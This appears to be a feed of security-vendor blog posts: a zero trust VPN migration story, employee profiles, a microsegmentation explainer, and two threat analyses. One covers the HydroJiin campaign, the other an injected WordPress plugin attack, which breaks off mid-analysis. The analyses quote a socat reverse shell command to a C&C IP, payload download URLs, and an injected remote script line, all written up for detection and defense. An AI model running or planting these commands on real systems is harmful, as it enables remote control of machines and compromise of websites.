User Experience: How a Zoom Meeting Transformed our Entire Network This post also appeared on LinkedIn. In November of 2019 (back before the pandemic lockdown), I was the CISO for an international professional services organization. My most important strategic project at that time was creating the “always-on VPN.” What was this top-tier objective? An attempt to modernize our global secure remote access. Why? With our old systems, it was too much effort to access company assets from outside the security perimeter, and we expected to grow as more people worked outside the office. (Little did we know...) My CIO and I identified four important pain points the always-on VPN had to relieve: Inconvenience: Reduce login complexity to just a single sign-on (SSO) service for any device, anywhere, to improve the user experience. Threat risk: Reduce attack surface as the number of people outside the security perimeter increased. Poor performance: Reduce traffic backhauled to our data centers via MPLS connections to improve the user experience. High overhead: Reduce MPLS backhaul expenses by using direct internet connections. We had different ideas about what was most important and what to do first. But we both agreed that our current architecture wasn’t going to support our move into a cloud-first, remote environment. The recurring dilemma: user experience or enterprise security My CIO questioned our approach to remote access: “Why do I have to authenticate to a company laptop, launch a VPN client, provide my network password again, enable my soft multi-factor authentication (MFA) token, and manually input an 8-digit rotating authenticator just to connect to the business network?” Our tedious network-security login workflow contributed to a terrible user experience and was so onerous it made employees want to avoid security. 
The problem was further compounded by other services employees regularly use—banking, social media, and e-commerce, for example—requiring additional multi-factor authentication (MFA) push notifications to registered or authorized devices. I agreed with his user experience concerns. I also wanted to reduce the number of inbound VPN listener services (three) and VDI gateways (two) running in three different continental DMZs. There had been several well-publicized VPN concentrator exploits that required emergency patches or updates around this same time. Updates like these needed to be tested and reviewed for operational impact, which meant longer implementation times and longer windows of network risk exposure. Turns out these two issues were connected. O365 broke us We backhauled all of our United States remote traffic to a VPN concentrator at a colocation data center in Phoenix, Arizona. (The London and Beijing data centers had similar setups in Europe and Asia, respectively.) Our 2019 strategic plan was to adopt Office 365 via an Azure tenant. A business-impact assessment suggested that our road-warrior traffic (already trending up) would grow exponentially with increased use of Office 365 apps like SharePoint, OneDrive, Teams, and Skype. If every eligible remote worker in the US went on the road simultaneously, all internet and Office 365 traffic would be backhauled to Phoenix and then sent to the Los Angeles service edge before heading for its real destination—the cloud. Our O365 data traveled a circuitous route across multiple networks, slowing app performance. We had to figure out how to improve Office 365 performance. One option was to implement a split-tunnel solution, but the lack of device, traffic, and network visibility heightened risk far beyond our appetite. We needed a way to separate internet-bound traffic from internal-application-bound traffic. 
Zero trust shows us the way Zero trust wasn’t new to me: we had used a cloud secure web gateway (SWG) for years to address threats and security objectives. The SWG excelled at inspecting outbound traffic for threats and data loss, and seamlessly secured all of our business SaaS tenants. It also offered the best visibility into outbound traffic behavior and usage metrics I’d ever experienced. So I thought, “Can we use this model for inbound private cloud traffic using zero trust?” (Spoiler alert: Yes. Yes we can.) Zero trust is a new paradigm, and it requires a fundamental change in connectivity mindset. Legacy castle-and-moat security practitioners ask, “How do I securely connect this device to this network?” Zero trust is more direct (in more ways than one), and asks “How do I securely connect this user to this application?” In 2019, Gartner defined the practical implementation of zero trust as “Zero Trust Network Access,” or ZTNA: ZTNA, also known as the software-defined perimeter (SDP), is a set of technologies that operates on an adaptive trust model, where trust is never implicit, and access is granted on a “need-to-know,” least-privileged basis defined by granular policies.* We deployed a network connector and set up a straightforward entitlement configuration for user provisioning. In other words: No new endpoint software deployment and installation. Now we could replace our VPN solution with a Zero Trust solution, and reduce our attack surface across all users. Added benefit: We immediately discovered half a dozen hidden “shadow IT” servers. Fortunately, they were properly maintained and patched via automation, but until ZTNA, nobody knew who used them or what they were for. The big change: COVID-19 By February 2020, we were ready to deploy zero trust across the whole enterprise. Then COVID-19 shut down the world. We faced several obstacles to a successful pivot to remote work. 
Around 20% of our workforce had never worked remotely: no business laptop, no MFA token, no knowledge of BYOD application management practices. All IT resources went towards adding licensing and infrastructure to our VDI environment. As we stabilized our remote workforce, our 2019 business impact assessment became a reality. The explosion of Zoom, Teams, and Bluejeans web conferencing saturated our U.S. VPN gateway bandwidth. Rolling out zero trust alleviated that pain, and addressed user experience and security in a single solution. The zero trust footnote: Why is my meeting quality bad? After we’d dealt with keeping employees safe during the COVID-19 crisis, I was gung-ho for moving fully forward with a Zero Trust infrastructure for the entire company. But our CIO and I had a difference of opinion on where to take Zero Trust. I wanted to push it further and use it to enable direct internet connections to our cloud applications and assets, while he felt that might introduce too much change for employees during the pandemic. But oddly enough, in April 2020 our CEO called a meeting. The CEO and his wife had concurrent Zoom calls, each with a similar number of participants. The CEO’s online meeting suffered continual audio and video drops. But his wife’s call ran with great sound and video. Why was this happening? What’s the problem? The issue was exactly what the CIO and I had discussed a week earlier: backhauling. Our CEO’s web-conferencing traffic was routing through his home network in Washington, D.C., out to our Phoenix data center, and then to the Zscaler service edge in Los Angeles—all before connecting to the Zoom infrastructure. As for his wife’s call, well, we can make the simple assumption that her device traffic went directly through their local gateway. As I told the CIO: “You can fix this with direct internet connections—using zero trust.” This meeting with the CEO triggered our global zero trust user deployment—a happy ending! 
Thu, 18 Mar 2021 08:00:01 -0700 Brad Moldenhauer Celebrating Women at Zscaler: Wendi Lester and Marina Ayton In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Marina Ayton has been at Zscaler for a year and a half and currently serves as a Regional Director for the UK team. Her career journey has been eventful and fast-paced, and she hopes to continue that success in the coming years while mentoring and fostering career growth in others. “The thing I'm most proud of in my career has probably been my progression over a short amount of time. I have been promoted about eight times in the last six years,” she said. “And I think just the nature of working for a high-growth company that operates on a totally meritocratic basis gives you a huge opportunity to grow.” “I would say that recently, my complete career highlight has been having the opportunity to become a leader,” she said. “And with that comes a huge responsibility, right? To help train and develop all of this talent—high potential, incredible individuals—to support them on their next phase of growth.” “I think my favorite thing about working in technology and for a company like Zscaler is the environment that's built around it,” she said. “We have this incredible culture of excellence, which has been developed, which gives you this kind of huge feeling of pride as you're working alongside some of the industry's best and top performers.” Outside of work, Marina enjoys being outdoors, skiing and playing tennis and squash. She also sits on the board of the Prince's Trust RISE program, which is a youth charity that helps young people aged 11 to 30 get into jobs, education, and training. Wendi Lester began her journey at Zscaler in February 2020 and is currently the Director of Global Real Estate and Workplace Operations. 
She has served as a mentor to many and believes in the power of personal connections to succeed and build a career you love. “What I am most proud of in my career is the people that I've mentored and worked with that have grown and matured and become leaders at other multinational companies,” she said. “The advice I would give to women who want to get into tech is: be brave and be willing to network and be willing to get out there, try something new, and to want to engage with people, because it's through building relationships and networking that you will find your best success,” she said. “And you will be able to find advocates, and you'll be able to find people that you can mentor, and that will be very fulfilling in your career.” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Wed, 17 Mar 2021 08:00:01 -0700 Kristi Myllenbeck A look at HydroJiin campaign Zscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner malware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the business of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber criminals. We speculate that the malware author is running widespread campaigns involving different commodity and custom malware to steal information to sell in underground marketplaces. 
Similar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet another example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as well as communication back to C&C servers. While we do not know the impact of this particular campaign, this type of malware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated, this campaign uses a number of different techniques to increase its chances of successfully infiltrating organizations that do not take proper precautions. This campaign utilizes a variety of payloads and infection vectors, from commodity RATs to custom malware, email spam, backdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this campaign: A multilevel infection chain of payloads leading from one to the next. A custom Python-based backdoor deployed along with other RATs (Netwired and Quasar). A Python backdoor command that checks for macOS, indicating the possibility of more cross-platform functionality in the future. A connection to a threat actor who is also involved in distributing multiple malicious tools via a dedicated malware e-commerce website. The possibility of a backdoored malware payload, similar to the CobianRAT case. Heavy (though not unusual) use of Pastebin to host encoded payloads. Infection chain Figure 1: Infection Chain The infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery vector of this downloader, but we suspect the use of spam emails and cracked software, as we have seen in earlier campaigns. Once the attackers achieve initial compromise, the downloader downloads three files: Injector - Used as a loader to inject downloaded payloads into legitimate processes. Netwired RAT - A commodity RAT used to control the infected system and steal information. 
DownloaderShellcode - Obfuscated Meterpreter-based shellcode to download further payloads. A Pyrome Python backdoor is downloaded by this shellcode, which also downloads socat and a miner dropper; the miner dropper in turn downloads another RAT named Quasar. Each payload and its functionality is explained below. 1 Analysis of downloader payload First, the downloader downloads a payload from Pastebin and saves it to the %TEMP% path with a randomly generated name. The payload hosted on Pastebin is encoded in base64 with the text string reversed. Figure 2: Downloading encoded payload from pastebin The downloaded malware is an injector. It downloads two more payloads and passes an argument to the first payload for injection. Figure 3: Passing payloads to injector Payloads are then downloaded from: xmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt - Shellcode Downloader pastebin[.]com/raw/G0jcGs79 - NetwiredRC These payloads are similarly string-reversed after base64 encoding. 1.1 NetWiredRC The second payload in this case, hosted on Pastebin, is commodity malware known as NetWiredRC. NetWiredRC is a publicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam and phishing emails to distribute NetWiredRC, and it has also been observed in use by APT threat actors in the wild. NetWiredRC’s main focus is to gain unauthorized control of the victim machine, steal stored credentials, and perform keylogging. This malware has had multiple version updates with bug fixes and new functionality. This sample communicates with beltalus.ns1[.]name:8084 for further commands. 
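As described above, the payloads are stored as base64 with the text string reversed. A minimal Python sketch of the decoding, assuming the reversal is applied to the base64 text (that ordering is our reading of the write-up, not something stated explicitly):

```python
import base64

def decode_payload(blob: str) -> bytes:
    # Undo the paste encoding seen in this campaign: the base64 text is
    # stored reversed (assumed order), so reverse first, then b64-decode.
    return base64.b64decode(blob[::-1])

def encode_payload(data: bytes) -> str:
    # Inverse operation, useful only for testing the round trip.
    return base64.b64encode(data).decode()[::-1]
```

For example, decode_payload("=IWY") yields b"ab"; applying the same function to a downloaded paste body would recover the next-stage binary.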
Configuration extracted from the Netwire RAT: {'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir': b'%AppData%\\Logs_temp\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock executable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True} 1.2 Shellcode Downloader The first of the two downloaded payloads is Metasploit shellcode, encoded with the Shikata Ga Nai encoder, capable of downloading another payload from: r3clama[.]com/files/chrome.exe. PDB path embedded inside the binary: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb The shellcode downloader downloads the following payloads: r3clama[.]com/files/ : Socat tool r3clama[.]com/files/services.exe : Miner Dropper 1.2.1 PyInstaller Payload The payload downloaded from r3clama[.]com is Python-based malware bundled using PyInstaller. Capabilities of this payload include: Persistence using a Run key. Download, save, and extract from https://r3clama[.]com/files/ Download a Monero miner executable from https://r3clama[.]com/files/services.exe, which runs and further downloads QuasarRAT. Start a network communication thread. Figure 4: Configuration settings of malware Network Communication The malware next communicates with a C&C server at IP '193.218.118[.]190' on port 8266, first sending a key to the server and then waiting for JSON commands. Commands supported by this malware include w0rm, url, and upload. Figure 5: Commands supported by Python backdoor Commands 'url' and 'upload' Both the url and upload commands are supported only on Windows—on any other platform these commands are ignored. The two commands are largely the same: each downloads and saves a payload from a specified URL. 
Files are saved in a newly created directory under %temp% with 16-character random names. There are only two differences: in the case of upload, the downloaded file is saved at %temp%/upload, and in the case of url, the file is saved at %temp%/userbin. The url command also executes the file in addition to downloading it, while the upload command does not. Command 'w0rm' The w0rm command is supported on two platforms: Windows and macOS. On receipt of this command, socat runs with the following command line: "socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}" OS Command Windows: 'cmd.exe',pipes macOS: /bin/bash The malware then sends the hostname plus ’$>’ back to the C&C server over the socket. In short, this command provides the attacker a reverse shell on the system through socat. Socat Socat is an advanced, multipurpose data relay tool that supports a plethora of protocols. Below is the description from its creators: “socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.” - README Miner Dropper This is again .NET-based malware. It includes a Monero miner binary and all the DLL dependencies the miner executable requires. It drops and runs the miner payload, then downloads and runs an additional payload, again from Pastebin. Here is the Miner Dropper sequence: Installs the miner executable and dependency files. Figure 6: Installing xmrig miner dependency files Waits for the system to be idle before starting the miner. Figure 7: Checks if system is Idle before starting miner CheckActive checks whether the miner process is already running; if not, StartFiles starts it. 
Figure 8: Running miner executable with required arguments. After starting the miner, it downloads the Quasar RAT payload from https://pastebin[.]com/raw/khzLqKyN: Figure 9: Downloading another payload (QuasarRAT) This miner could be the MinerGate Silent Miner sold in the threat actor’s malware shop. If so, there is a further possibility that the miner itself is backdoored, similar to the old Cobian RAT case, with the actor piggybacking on client malware operators to distribute his own RATs. Unfortunately, we cannot verify this assumption without access to the builder. QuasarRAT QuasarRAT has been active since at least 2015. Quasar is an open-source project written in the .NET Framework and freely available to the public. This means anyone can take the code and use it freely, with or without modification, which has made the malware quite popular among cybercriminals. It has been used in everything from mass spam campaigns to targeted attacks. The sample used in this campaign was version 1.3, which has appeared in a number of past campaigns. Configuration of QuasarRAT Version: "" C&C: "beltalus.ns1[.]name:8082;" Filename: "Client.exe" Mutex: "QSR_MUTEX_NJPXiF1GKqO6Y3uwjn" The C&C address used to control the Python backdoor and socat reverse shell is historically known to host C&C servers for many other malware families. Here is a list of malware and the corresponding ports used to host C&C servers on this IP in the past: Port 8266 - Python backdoor; port 4442 - Socat OPENSSL listener; port 1111 - NjRAT; port 2407 - QuasarRAT; port 8050 - Nanocore. Threat Actor HydroJiin We believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor has been active on forums such as hackforums[.]net since 2010 and on YouTube since at least 2007. Initially the actor was involved with game mods and cracks, and eventually moved into the malware space. We believe with high confidence that this actor is from a French-speaking region. 
Under his other alias, JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two aliases, we are calling this campaign and actor HydroJiin. We are attributing this campaign to HydroJiin with high confidence for the following reasons: The JiiN shop (xmr-services) is used in this campaign. The JiiN shop (xmr-services) sells malware tools that Hydro makes videos about. This campaign downloads an encoded payload from a paste by the user Hydro59. All of the above indicate the relationship between HydroJiin, this campaign, and xmr-services. Malware Shop The website called “JiiN shop” is named after the username of the malware developer/seller and hosted at “xmr-services[.]com.” It is used to advertise and sell different malware products. The threat actor uses https://shoppy[.]gg to handle cryptocurrency payments and also sells some additional items on Shoppy. Figure 10: JiiN Shop Malware sold on this website includes: Minergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on the CPU or GPU, hidden from the user. Comes with a builder with options for obfuscation, persistence, etc. Coak Crypter - As the name implies, a packer tool to obfuscate other malware and make it undetectable. NiiJ Stealer - A very basic stealer that steals passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc., and sends them to the C&C panel. INK Exploit - Claims to make malware FUD, but provides no details about the specific exploit. The Campaign The infection cycle and malware payloads discussed above are just part of an ongoing campaign, which has been active since at least September 29, 2020. The source website for this campaign is also serving other payloads, which led us to more domains and payloads. Covering the whole campaign is out of scope for this blog post, but we are providing some details we have noticed. 
A non-exhaustive list of malicious websites serving malware, along with C&C domains, is included in the IOC section. Most of the domains, as well as the served file names, follow a pattern. The domains are mostly registered through Namecheap.

Domain pattern: [a-z]{4,8}\d{2,4}[a-z]{0,2}.xyz

E.g.:
pzazmrserv194[.]xyz
mpzskdfadvert329[.]xyz
hklkxadvert475[.]xyz
zgkstarserver17km[.]xyz

Filename pattern example | Malware family
atx111.exe | SmokeLoader
socks111.exe | SystemBC
tau111.exe | Taurus Stealer
lkx111 | Roger Ransomware
lb777 | LockBit ransomware
void.exe | Downloader
desk | AnyDesk

Conclusion

The threat actor HydroJiin has been in the malware business for some time now, selling multiple malware types while also running his own campaigns. The malware payload download stats from Pastebin indicate that he is having decent success. This actor might not be highly advanced, but he is persistent, using various tools, techniques, and methods to increase his chances of success. SSL inspection is advisable to detect and block threats like these that use SSL to hide their malicious intent. We at Zscaler ThreatLabZ continue to monitor all levels of threats and strive to protect our customers from them.
Detection

Figure 11: Zscaler Cloud Sandbox report flagging the malware

In addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels:

Win32.Backdoor.NetWiredRC
Win32.Downloader.NetWiredRC
Win32.Backdoor.QuasarRAT
Win32.Coinminer.Xmrig
Win32.Downloader.MiniInject
Win32.Downloader.Pyrome

MITRE ATT&CK

ID | Technique | Description
T1059 | Command and Scripting Interpreter: Windows Command Shell | Executes reverse shell commands
T1555 | Credentials from Password Stores | RAT functionality mentioned above
T1573 | Encrypted Channel: Symmetric Cryptography | Encrypts the communication between the victim and the remote machine
T1105 | Ingress Tool Transfer | Downloads the miner and RAT onto the victim machine
T1056 | Input Capture: Keylogging | RAT functionality mentioned above
T1112 | Modify Registry | Modifies the Run entry in the registry
T1090 | Proxy | Quasar uses SOCKS5 to communicate over a reverse proxy
T1021 | Remote Services: Remote Desktop Protocol | Quasar module to perform remote desktop access
T1053 | Scheduled Task/Job: Scheduled Task | Establishes persistence by creating new scheduled tasks
T1082 | System Information Discovery | Both the Quasar and NETWIRE RATs have this feature to discover and collect victim machine information
T1125 | Video Capture | RAT functionality mentioned above
T1113 | Screen Capture | RAT functionality mentioned above
T1132 | Data Encoding | Downloads a Base64-encoded file
T1496 | Resource Hijacking | Installs the XMRig miner on the victim machine
T1027 | Obfuscated Files or Information | An XOR operation is used to decrypt the file

IOCs

Filename | MD5 | Malware
Void.exe [parent file] | 656951fa7b57355b58075b3c06232b01 | Win32.Downloader.MiniInject
ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt | 9c50501b6f68921cafed8af6f6688fed | Win32.Downloader.NetWiredRC
chrome.exe | 294fd63ebaae4d2e8c741003776488c2 | Win32.Downloader.Pyrome
Service.exe | e9bccc96597cc96d22b85010d7fa3004 | Win32.Coinminer.Xmrig
khzLqKyN | 3bb3340bccdab8cde94dd1bf105e1d3e | Win32.Backdoor.QuasarRAT
G0jcGs79 | F094D8C0D9E6766BCCF78DA49AAB3CBC | Win32.Backdoor.NetWiredRC

URL | Malware
gzlkmcserv437[.]xyz/void.exe | Win32.Downloader.MiniInject
r3clama[.]com/files/ | Socat tool
r3clama[.]com/files/services.exe | Win32.Coinminer.Xmrig
pastebin[.]com/raw/khzLqKyN | Win32.Backdoor.QuasarRAT
pastebin[.]com/raw/G0jcGs79 | Win32.Backdoor.NetWiredRC

C&C | Malware
beltalus.ns1[.]name:8084 | NetWiredRC
82.65.58[.]129 | NetWiredRC
xmr.pool.minergate[.]com | XMRig miner
beltalus.ns1[.]name:8082 | QuasarRAT
193.218.118[.]190:8266 | Python (Pyrome) backdoor
193.218.118[.]190:4442 | Socat listener (OpenSSL)
193.218.118[.]190:1111 | NjRAT
193.218.118[.]190:2407 | QuasarRAT
193.218.118[.]190:8050 | Nanocore

Wed, 14 Apr 2021 16:42:11 -0700 Atinderpal Singh

How to Describe the Goals of Microsegmentation

Network segmentation has been a recommended network security practice for many years. The concept of segmenting a network into small chunks grew from the need to provide processing speed and power, uptime, and availability of network resources. Years later, security architects recognized how this idea of segmentation could also be beneficial from a cybersecurity standpoint.
Somewhere along the line, as network segmentation evolved into microsegmentation, features became fused with benefits, and the endgame was distorted as vendors vied to position their technologies as the very best microsegmentation solution on the market. This only served to pile on confusion for end users who tried to implement microsegmentation but abandoned ship when it became too complex and didn’t deliver expected results. Now, one might argue that the endgame of microsegmentation is pretty clear: breaking down a large, sprawling network into manageable bits. But is that explanation enough to sell your executive team on the thousands of dollars and hundreds of hours it takes to evaluate, implement, and manage a microsegmentation program? Probably not. Particularly not when using traditional methods of microsegmentation that use legacy tooling, which is kludgy and was originally designed to protect the perimeter, meaning that the benefits are counterbalanced by the challenges of retrofitting an “outside” security control for internal network purposes. Why do microsegmentation vs. how to do microsegmentation As I sit at my desk and contemplate how to explain the benefits of microsegmentation, I find it’s helpful to fall back on non-security examples that everyone can relate to. After all, no two security or networking programs are the same and no two organizations have carbon copy business requirements, data, or systems that influence how microsegmentation is accomplished. Yet most people can relate to examples taken from daily life. If you’re the security or infrastructure person trying to garner non-techie budget and/or support for a microsegmentation project, focusing on the “why”—in simple terms, as opposed to “you can restrict this host from talking to that server”—can be extremely useful. 
In security’s view, the goal of microsegmentation is to implement fine-grained control across collections of hosts, servers, databases, applications, etc., which prevents attackers from exploiting an entire network once they’ve compromised one endpoint, user, or other vulnerability. However, that doesn’t sound super sexy or make mountains of money appear from the CFO’s coffers. The business benefit can be inferred, but it’s neither explicitly stated nor easily understood if networking isn’t one’s gig. It’s also helpful to separate the “how” from the “why,” or the features from the benefits. Focused security efforts For our first example, let’s pretend you’re driving from Boston to Buffalo. At first blush, this seems fairly straightforward: hop on I-90W and drive for seven or eight hours. Depending on where in the Boston area you’re starting from and where in the Buffalo area you need to go, it might take you more or less time. A few variables, but this plan is simple and focused. But how does the route change if you’re the kind of person who hates driving on highways? What happens to your plan if a portion of the interstate is under construction or a major crash backs up traffic for hours? What if you want to stop along the way to have a nice meal instead of zipping in and out of a rest stop along the side of the highway? Upon further thought, a straight line from east to west may not be the best option. It is most certainly not the only option, in any case. And if you input your travel requirements and preferences into three different GPS services, you may very well end up with multiple divergent routes. There isn’t any “one” way to get from Boston to Buffalo; the “best” travel route depends on various factors. The same is true for network traffic between hosts, applications, servers, etc. Any given network may have dozens or even hundreds of network paths on which communication can travel.
Many of those network traffic routes are unnecessary for normal business operations, but they exist (just like some dirt roads between Boston and Buffalo surely exist). If you’re an infrastructure/operations or security professional and you consider how to protect every single traffic route between apps/hosts/services on your networks, it quickly becomes overwhelming—just like if you were to thoughtfully evaluate every highway/street/backroad between Boston and Buffalo. At some point, before your car trip begins, you have to decide which route you’ll take. Identifying the “best” route means incorporating your endgame (“driving from Boston to Buffalo”) while avoiding the interstate around Albany during rush hour and allowing you to stop at Dinosaur Bar-B-Que in Syracuse before finishing your trip. By defining your goals for the trip, you can then reduce the number of viable routes and focus your planning on only the routes that fit your requirements while taking into account time-to-destination and avoidance of construction. In a network, you can’t limit the available paths to one (that would destroy processing), but you can limit the number of traffic routes networked resources can use by blocking unnecessary network paths and creating secure zones (i.e., microsegments or “collections”) inside which only verified applications and services can communicate. This, in turn, reduces the network attack surface, which results in a focused strategy for protecting the organization’s “crown jewels,” a.k.a., its data-rich applications. The “how” is using microsegmentation to shrink the attack surface and the “why” is to achieve a targeted security strategy that protects your communicating assets. Is microsegmentation “the best” strategy? 
If you’re in a situation where you’re trying to figure out if microsegmentation is the “best” strategy to protect your networks, pondering your options at a high level may lead you to conclude that microsegmentation is too complex (“there are too many traffic routes attackers can use to access my crown jewels!”), too costly (“I have to secure all the routes!”), and not scalable (“there are too many networked resources to protect across disparate environments!”). But if you stop for a moment and consider your use cases—decreased operational complexity and/or ubiquitous application-centric control across networking environments—it’s easy to think of other things (like driving to Buffalo for chicken wings) that simplify the decision process and make a thorny subject seem easier to navigate. When trying to garner budget or support from a business-focused exec for a microsegmentation project, use an analogy to explain your request. You just might find it’s the best tactic for explaining “why.”

Additional resources:
How Microsegmentation Differs from Network Segmentation
Zero Trust Microsegmentation for Hybrid Cloud
Three Paths for Reducing the Network Attack Surface

Tue, 16 Mar 2021 10:47:54 -0700 Dan Perkins

Low-volume multi-stage attack leveraging AzureEdge and Shopify CDNs

Introduction

In February 2021, ThreatLabZ observed a few instances of a low-volume, multi-stage web attack in the Zscaler cloud. This web attack leveraged legitimate Microsoft servers, Dropbox, and Shopify's content delivery network to host the malicious files. The attack chain started from a WordPress site with a compromised plugin. When the victim browsed to the compromised e-commerce WordPress site, JavaScript injected into the WooCommerce plugin kick-started the infection chain. The infection chain on the endpoint device consists of multiple stages involving MSHTA, PowerShell, and a C# backdoor that is also executed inline by PowerShell code.
Based on our research, this threat actor has not been documented previously, and we have not yet attributed the activity to any known threat actor. We have given the name METRICA to the new C# backdoor discovered in this research. In this blog, we describe the technical details of the entire infection chain end-to-end.

Attack flow

Figure 1 shows the end-to-end attack flow, which leads to the download of the final backdoor, METRICA.

Figure 1: Attack flow

As shown in the attack flow above, in one of the observed instances, the user searched for the string “steelcase adjustable arm” on the Google search engine. From the search results, the user navigated to the URL:

officechairatwork[.]com/product/steelcase-think-chair-3d-knit-back-4-way-adjustable-arms

Figure 2 shows officechairatwork[.]com, a legitimate WordPress-based e-commerce website.

Figure 2: e-commerce WordPress site

The site uses the WooCommerce order-tracking WordPress plugin. One of the JavaScript files for this plugin was injected with malicious code. Interestingly, the injected code uses base64 encoding to avoid suspicion.

URL of the injected JavaScript:

hxxp://officechairatwork[.]com/wp-content/plugins/yith-woocommerce-order-tracking/assets/js/ywot.js?ver=5.6

Figure 3 shows the injected code.

Figure 3: JavaScript code injected into the WooCommerce WordPress plugin

This injected code dynamically creates a script element using the HTML DOM, which adds an external JavaScript reference:

"script.src = 'https://metrica2.azureedge[.]net/tracking'"

This results in the website loading the malicious code from the above URL. It ultimately redirects the user to the legitimate file-hosting site Dropbox to download a ZIP archive containing the malicious LNK file.

URL: www.dropbox[.]com/s/3mrfasci8ibhms9/

Technical analysis

First, we will look at the malicious JavaScript code that was injected into the compromised WordPress plugin on the website, and how it leverages multiple stages to redirect the user to the final download page.
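Because the injected loader hides its second-stage reference behind base64, one practical triage step is to scan plugin JavaScript for long base64-looking blobs and decode them. Below is a minimal, hypothetical sketch of this approach (the helper name and sample blob are ours for illustration, not taken from the actual injected script):

```python
import base64
import re

# Hypothetical triage helper: flag long base64-looking runs inside a
# plugin JavaScript file and show what they decode to.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def find_base64_blobs(js_source: str):
    """Return (blob, decoded-text) pairs for candidate base64 strings."""
    results = []
    for blob in B64_RE.findall(js_source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except Exception:
            continue  # not valid base64 or not printable text -- skip
        results.append((blob, decoded))
    return results

# Illustrative injected snippet that hides a script URL in base64
# (defanged; constructed here, not copied from the compromised site).
payload = base64.b64encode(
    b"script.src = 'https://metrica2.azureedge[.]net/tracking'"
).decode()
js = f"var _0x1 = atob('{payload}'); eval(_0x1);"

for blob, decoded in find_base64_blobs(js):
    print(decoded)  # -> script.src = 'https://metrica2.azureedge[.]net/tracking'
```

In practice, decoded strings referencing external script hosts are a strong signal that a plugin file has been tampered with.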
Injected JavaScript analysis

Note: Please refer to the Appendix section at the end of the blog for the complete JavaScript code snippets.

Stage-1 JavaScript

URL: metrica2.azureedge[.]net/tracking

The first-stage JavaScript performs a few checks to determine the next-stage JavaScript to be loaded. It contains references to four more JavaScript files, which are explained in detail in this section. The Stage-1 JavaScript code defines three functions:

1. load_path: Creates a dynamic script element in the DOM.
2. getEmails: Uses a regex to check whether a given string is in the standard email ID format.
3. valid: Scans the page’s ‘input’ elements to retrieve the logged-in user’s email ID.

Execution of the JavaScript code starts by retrieving two items from the browser’s sessionStorage, named ‘startDate’ and ‘startMail’. It uses these fetched values to perform the following actions:

1. Checks whether startDate is valid and, if so, calculates the difference between the current time and the saved time (startDate). If the difference is less than 100 seconds, it calls the load_path function, which in turn loads the next-stage JavaScript from the path “”
2. If startDate is not valid, the function named valid is called at 500-millisecond intervals to retrieve the logged-in user’s email ID. When the email ID is retrieved successfully, it calls the load_path function, which in turn loads the next-stage JavaScript from the path “”

Stage-2 JavaScript

URL 1: metrica2.azureedge[.]net/lockpage

The second-stage JavaScript performs two operations:

1. Prepends a ‘div’ element with the id ”slashpage” to the website’s main page and inserts an empty ‘iframe’ element with the name “splashpage-iframe” into it.
2. Creates a dynamic script element in the DOM, which loads the next-stage JavaScript from the path “”

URL 2: metrica2.azureedge[.]net/slashpage

This performs the same operations as /lockpage. In addition, it retrieves the startDate item from sessionStorage and, if it is not found, sets it to the current date.
Stage-3 JavaScript

URL: metrica2.azureedge[.]net/PatternSite

The third-stage JavaScript has configurable parameters that control the execution behaviour as well as the frequency of execution of the contained JavaScript code. This stage of JavaScript is responsible for displaying or hiding a banner as a social engineering technique to lure the victim into downloading a malicious ZIP file. The banner is displayed by configuring the ‘div’ and ‘iframe’ elements created by the second-stage JavaScript. The source URL for the banner is “”

Figure 4 shows the banner displayed to the user.

Figure 4: Banner displayed to the user

When the user clicks the Continue button, it initiates the ZIP file download request in the background. As soon as the download request is sent, the banner content is also changed, as shown in Figure 5.

Figure 5: Changed banner content prompting the user to open the downloaded file

The downloaded ZIP file contains an LNK file, which is executed by the user. For the purpose of technical analysis, we will look at the LNK file with the MD5 hash 2d0f946bac9b565b15cb739473bd4b20. This LNK was archived inside a ZIP file hosted on the Dropbox URL: www.dropbox[.]com/s/3mrfasci8ibhms9/

On execution, the LNK file used the following command line to fetch malicious VBScript code from an attacker-configured server:

